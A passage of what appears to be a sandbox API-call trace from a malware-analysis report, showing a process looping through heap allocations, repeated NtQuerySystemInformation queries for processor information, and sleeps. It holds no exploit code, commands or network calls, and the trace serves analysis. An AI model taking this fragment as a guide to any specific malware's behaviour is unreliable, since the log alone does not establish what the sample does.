ResultLength=0x19ee88*=0xc0) returned 0x0 [0229.200] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.201] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0229.202] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.202] Sleep (dwMilliseconds=0x110) [0229.238] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0229.238] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.239] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.239] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0229.239] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.240] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.240] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0229.245] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.245] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.245] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0229.245] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0229.246] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.246] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0229.246] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.247] Sleep (dwMilliseconds=0x110) [0229.273] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0229.273] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.274] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.274] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0229.274] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.275] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.275] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0229.275] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.275] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.275] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0229.275] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0229.276] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.276] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0229.276] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.276] Sleep (dwMilliseconds=0x110) [0229.278] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0229.278] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.278] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.279] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0229.279] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.279] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.279] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0229.279] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.280] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.280] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0229.280] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0229.283] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.283] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0229.287] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.287] Sleep (dwMilliseconds=0x110) [0229.295] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0229.295] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.296] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.296] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0229.296] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.296] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.296] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0229.296] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.297] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.297] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0229.297] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0229.297] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.297] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0229.298] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.298] Sleep (dwMilliseconds=0x110) [0229.315] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0229.315] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.315] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.315] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0229.316] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.316] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.316] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0229.316] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.317] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.317] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0229.317] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0229.317] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.317] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0229.317] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.318] Sleep (dwMilliseconds=0x110) [0229.330] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0229.330] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.331] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.331] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0229.331] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.332] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.332] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0229.332] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.332] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.332] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0229.333] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0229.333] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.333] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0229.334] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.334] Sleep (dwMilliseconds=0x110) [0229.341] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0229.341] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.341] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.342] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0229.342] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.342] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.342] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0229.342] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.343] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.343] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0229.343] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0229.344] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.344] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0229.344] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.344] Sleep (dwMilliseconds=0x110) [0229.359] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0229.359] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.359] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.359] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0229.359] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.360] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.360] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0229.360] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.360] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.361] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0229.361] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0229.361] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.361] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0229.362] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.362] Sleep (dwMilliseconds=0x110) [0229.373] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0229.373] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.374] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.374] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0229.374] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.374] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.378] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0229.378] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.379] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.379] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0229.379] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0229.380] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.380] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0229.381] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.381] Sleep (dwMilliseconds=0x110) [0229.391] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0229.391] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.392] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.392] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0229.392] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.393] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.393] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0229.393] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.394] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.394] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0229.394] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0229.394] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.394] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0229.395] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.395] Sleep (dwMilliseconds=0x110) [0229.467] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0229.467] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.468] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.468] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0229.468] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.469] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.469] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0229.469] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.469] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.469] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0229.469] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0229.470] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.470] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0229.470] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.470] Sleep (dwMilliseconds=0x110) [0229.482] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0229.482] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.483] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.483] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0229.483] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.484] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.484] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0229.484] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.484] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.484] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0229.484] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0229.485] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.485] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0229.485] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.485] Sleep (dwMilliseconds=0x110) [0229.498] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0229.498] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.499] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.499] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0229.499] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.499] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.499] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0229.500] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.500] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.500] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0229.500] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0229.500] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.500] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0229.501] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.501] Sleep (dwMilliseconds=0x110) [0229.513] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0229.513] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.514] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.514] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0229.514] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.515] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.515] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0229.515] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0229.516] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0229.516] 